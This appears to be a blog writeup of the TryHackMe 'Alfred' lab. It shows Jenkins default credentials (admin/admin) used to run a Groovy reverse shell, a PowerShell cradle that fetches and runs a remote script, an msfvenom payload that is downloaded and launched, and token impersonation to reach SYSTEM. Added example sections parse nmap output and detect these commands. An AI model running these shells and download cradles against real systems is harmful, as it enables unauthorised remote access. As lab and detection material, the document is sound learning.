
Daniel Cano Merchán - Hacking & Tech

Writeup TryHackMe Alfred

Writeup about the TryHackMe machine Alfred.

0 - Basic info

Windows machine

1 - Reconnaissance and enumeration

Starting with an nmap scan:

sudo nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln 10.10.😄
# Nmap 7.91 scan initiated Wed Jun  9 22:37:40 2021 as: nmap -sS -sC -sV -O -p- -oN scan.txt --script vuln -Pn 10.10.😄
Pre-scan script results:
| broadcast-avahi-dos: 
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 10.10.😄
Host is up (0.040s latency).
Not shown: 65532 filtered ports
PORT     STATE SERVICE            VERSION
80/tcp   open  http               Microsoft IIS httpd 7.5
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
3389/tcp open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020: 
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to cause a denial of service.
|           
|     Disclosure date: 2012-03-13
|     References:
|       http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0152
|   
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|           Remote Desktop Protocol vulnerability that could allow remote attackers to execute arbitrary code on the targeted system.
|           
|     Disclosure date: 2012-03-13
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0002
|_      http://technet.microsoft.com/en-us/security/bulletin/ms12-020
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_sslv2-drown: 
8080/tcp open  http               Jetty 9.4.z-SNAPSHOT
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum: 
|_  /robots.txt: Robots file
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 R2 (92%), Microsoft Windows Server 2008 R2 or Windows 8 (90%), Microsoft Windows Server 2008 R2 (89%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (89%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (89%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (89%), Microsoft Windows Server 2008 (88%), Microsoft Windows 7 SP1 (88%), Microsoft Windows 8.1 R1 (88%), Microsoft Windows 7 or Windows Server 2008 R2 (87%)
No exact OS matches for host (test conditions non-ideal).
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jun  9 22:43:06 2021 -- 1 IP address (1 host up) scanned in 327.24 seconds
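As an added example (not part of the original writeup), here is a small parser for the nmap normal-output format shown above that turns `--script vuln` findings into structured records (port, script, state, CVE ids, CVSS score), so a long scan like this one can be triaged by risk instead of read by eye. The sample input is a constructed, trimmed copy of the port 3389 block.

```python
import re

# Constructed sample in nmap normal-output (-oN) format: a trimmed copy of the --script vuln block above.
SAMPLE = """\
3389/tcp open  ssl/ms-wbt-server?
| rdp-vuln-ms12-020:
|   VULNERABLE:
|   MS12-020 Remote Desktop Protocol Denial Of Service Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0152
|     Risk factor: Medium  CVSSv2: 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:N/A:P)
|   MS12-020 Remote Desktop Protocol Remote Code Execution Vulnerability
|     State: VULNERABLE
|     IDs:  CVE:CVE-2012-0002
|     Risk factor: High  CVSSv2: 9.3 (HIGH) (AV:N/AC:M/Au:N/C:C/I:C/A:C)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
"""

PORT_RE = re.compile(r"^(\d+)/(?:tcp|udp)\s+\w+\s+(\S+)")     # "3389/tcp open  ssl/ms-wbt-server?"
SCRIPT_RE = re.compile(r"^\|_? ?([A-Za-z0-9-]+):")           # "| rdp-vuln-ms12-020:" or "|_http-csrf:"
TITLE_RE = re.compile(r"^\|   ([^\s:][^:]*)$")               # 3-space indented finding title, no colon
STATE_RE = re.compile(r"^\|\s+State:\s+(\w+)")
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")
CVSS_RE = re.compile(r"CVSSv\d:\s+(\d+(?:\.\d+)?)")

def parse_vuln_output(text):
    """Return one dict per NSE finding that carries a State line."""
    findings, cur, port, service, script = [], None, None, None, None
    for line in text.splitlines():
        if m := PORT_RE.match(line):                 # new port: reset the current finding
            cur, port, service = None, int(m.group(1)), m.group(2)
        elif m := SCRIPT_RE.match(line):             # new NSE script header
            cur, script = None, m.group(1)
        elif m := TITLE_RE.match(line):              # finding title inside a script block
            cur = {"port": port, "service": service, "script": script,
                   "title": m.group(1).strip(), "state": None, "cves": [], "cvss": None}
            findings.append(cur)
        elif cur is not None:                        # detail lines of the current finding
            if m := STATE_RE.match(line):
                cur["state"] = m.group(1)
            if m := CVSS_RE.search(line):
                cur["cvss"] = float(m.group(1))
            # reference URLs repeat the id, so only keep each CVE once
            cur["cves"] += [c for c in CVE_RE.findall(line) if c not in cur["cves"]]
    return [f for f in findings if f["state"]]

def worst_finding(text):
    """Highest-CVSS finding whose state is VULNERABLE, or None if nothing is flagged."""
    vuln = [f for f in parse_vuln_output(text) if f["state"] == "VULNERABLE"]
    return max(vuln, key=lambda f: f["cvss"] or 0.0, default=None)
```

Run on the full scan.txt the same parser also skips the `Couldn't find any ...` one-liners, since those never carry a State line.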

Nmap found 3 open ports: 80, 3389 and 8080 (the vuln scripts also flag the RDP service on 3389 for MS12-020, which is not needed for this box).

Nothing useful on port 80, just a page about the good Bruce Wayne. On port 8080, however, there is a Jenkins instance with a login form.

2 - Vulnerability Identification

I just tested the typical admin credentials and they worked… this is why you should never keep default passwords.

admin/admin

Under dashboard > project > configure > build there is a build step that takes a command line to play with.

3 - Exploit

Using this feature it is possible to execute remote commands, for example generating a reverse shell, either with this Java/Groovy snippet:

String host="10.9.😄";
int port=4433;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

or with a PowerShell one-liner that downloads and runs Invoke-PowerShellTcp (invoke.ps1) from my machine:

powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.😄/invoke.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.9.😄 -Port 4433

Setting up a listener on my machine:

nc -lvp 4433

Success:

C:\Users\bruce\Desktop>type user.txt
type user.txt
7900😄

4 - Post-Exploitation and privilege escalation

Following the room's instructions, I generated a Meterpreter reverse shell as a .exe file with msfvenom:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.9.😄 LPORT=4434 -f exe -o sh.exe

The .exe is served from my machine with a Python HTTP server on port 7777:

python3 -m http.server 7777

Using PowerShell on the target to download the file:

C:\Users\bruce\Desktop>powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.😄:7777/sh.exe','sh.exe')"
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.9.😄:7777/sh.exe','sh.exe')"

Also setting up a meterpreter listener:

msf6 exploit(multi/handler) > show options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (generic/shell_reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.9.😄       yes       The listen address (an interface may be specified)
   LPORT  4434             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target

Finally triggering the .exe file:

C:\Users\bruce\Desktop>powershell "Start-Process 'sh.exe'"
powershell "Start-Process 'sh.exe'"
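As an added defender-side example (not part of the original writeup), here is a small triage of constructed process-creation events modelled on the commands used above: a shell spawned by the Jenkins JVM, the WebClient download cradles, and the Start-Process launch of the dropped .exe. The Jenkins install path, IP addresses and file names are assumptions, not values from the machine.

```python
import re
import ntpath

# Constructed process-creation events (Sysmon Event ID 1 style fields) modelled on the
# commands in this writeup. The Jenkins JVM path and the IPs are placeholders.
JENKINS = r"C:\Jenkins\jre\bin\java.exe"          # hypothetical Jenkins JVM path
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"parent": JENKINS, "image": CMD,
     "cmdline": "cmd.exe /c powershell iex (New-Object Net.WebClient).DownloadString('http://10.9.0.1/invoke.ps1');"
                "Invoke-PowerShellTcp -Reverse -IPAddress 10.9.0.1 -Port 4433"},
    {"parent": JENKINS, "image": CMD, "cmdline": "cmd.exe /c dir"},             # ordinary build step
    {"parent": CMD, "image": PS,
     "cmdline": "powershell \"(New-Object System.Net.WebClient).Downloadfile('http://10.9.0.1:7777/sh.exe','sh.exe')\""},
    {"parent": CMD, "image": PS, "cmdline": "powershell \"Start-Process 'sh.exe'\""},
    {"parent": r"C:\Windows\explorer.exe", "image": PS, "cmdline": "powershell Get-ChildItem C:\\Users"},
]

CMDLINE_RULES = [
    ("ps_webclient_download", re.compile(r"net\.webclient\)\.download(string|file)\(", re.I)),
    ("ps_iex_remote_script", re.compile(r"\b(iex|invoke-expression)\b.*https?://", re.I)),
    ("ps_reverse_tcp_shell", re.compile(r"invoke-powershelltcp|-reverse\s+-ipaddress", re.I)),
    ("ps_start_process_exe", re.compile(r"start-process\s+'?[\w.\\-]+\.exe'?", re.I)),
]
CI_PARENTS = {"java.exe", "jenkins.exe"}   # JVM hosting Jenkins; the service-wrapper name is assumed
SHELLS = {"cmd.exe", "powershell.exe"}

def triage(event):
    """Return (severity, matched rule names) for one process-creation event."""
    hits = [name for name, rx in CMDLINE_RULES if rx.search(event["cmdline"])]
    ci_shell = (ntpath.basename(event["parent"]).lower() in CI_PARENTS
                and ntpath.basename(event["image"]).lower() in SHELLS)
    if ci_shell:
        # A CI server legitimately runs shells for build steps, so on its own this is
        # only medium; combined with a download cradle it becomes high.
        hits.insert(0, "ci_spawned_shell")
    severity = "high" if ci_shell and len(hits) > 1 else "medium" if hits else "none"
    return severity, hits

def triage_all(events):
    return [triage(e) for e in events]
```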

While writing this I realized that a simpler Metasploit approach would have been the web_delivery module; it may be an option on another machine:

exploit/multi/script/web_delivery

Following the TryHackMe instructions, I loaded the incognito module:

meterpreter > load incognito
Loading extension incognito...Success.

And listed the available tokens:

meterpreter > list_tokens -g

[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM

Delegation Tokens Available
========================================
\
BUILTIN\Administrators
BUILTIN\IIS_IUSRS
BUILTIN\Users
NT AUTHORITY\Authenticated Users
NT AUTHORITY\NTLM Authentication
NT AUTHORITY\SERVICE
NT AUTHORITY\This Organization
NT AUTHORITY\WRITE RESTRICTED
NT SERVICE\AppHostSvc
NT SERVICE\AudioEndpointBuilder
NT SERVICE\BFE
NT SERVICE\CertPropSvc
NT SERVICE\CscService
NT SERVICE\Dnscache
NT SERVICE\eventlog
NT SERVICE\EventSystem
NT SERVICE\FDResPub
NT SERVICE\iphlpsvc
NT SERVICE\LanmanServer
NT SERVICE\MMCSS
NT SERVICE\PcaSvc
NT SERVICE\PlugPlay
NT SERVICE\RpcEptMapper
NT SERVICE\Schedule
NT SERVICE\SENS
NT SERVICE\SessionEnv
NT SERVICE\Spooler
NT SERVICE\TrkWks
NT SERVICE\UmRdpService
NT SERVICE\UxSms
NT SERVICE\WinDefend
NT SERVICE\Winmgmt
NT SERVICE\WSearch
NT SERVICE\wuauserv

Impersonation Tokens Available
========================================
NT AUTHORITY\NETWORK
NT SERVICE\AudioSrv
NT SERVICE\DcomLaunch
NT SERVICE\Dhcp
NT SERVICE\DPS
NT SERVICE\lmhosts
NT SERVICE\MpsSvc
NT SERVICE\netprofm
NT SERVICE\nsi
NT SERVICE\PolicyAgent
NT SERVICE\Power
NT SERVICE\ShellHWDetection
NT SERVICE\W32Time
NT SERVICE\WdiServiceHost
NT SERVICE\WinHttpAutoProxySvc
NT SERVICE\wscsvc

The first one belongs to the Administrators group, so let's use it:

meterpreter > impersonate_token "BUILTIN\Administrators"
[-] Warning: Not currently running as SYSTEM, not all tokens will be available
             Call rev2self if primary process token is SYSTEM
[+] Delegation token available
[+] Successfully impersonated user NT AUTHORITY\SYSTEM


meterpreter > getuid 
Server username: NT AUTHORITY\SYSTEM

But with this I only hold the privileged token, not the full SYSTEM permissions. To solve this, migrate the Meterpreter session into a process owned by NT AUTHORITY\SYSTEM to get the real privileged permissions.

There are many processes like svchost.exe, services.exe or winlogon.exe running as SYSTEM; migrating to one of them gives full access to the machine.

meterpreter > migrate 671

Finally reading the root flag:

C:\Windows\System32\config>type root.txt
type root.txt
dff0😄

Thanks for reading!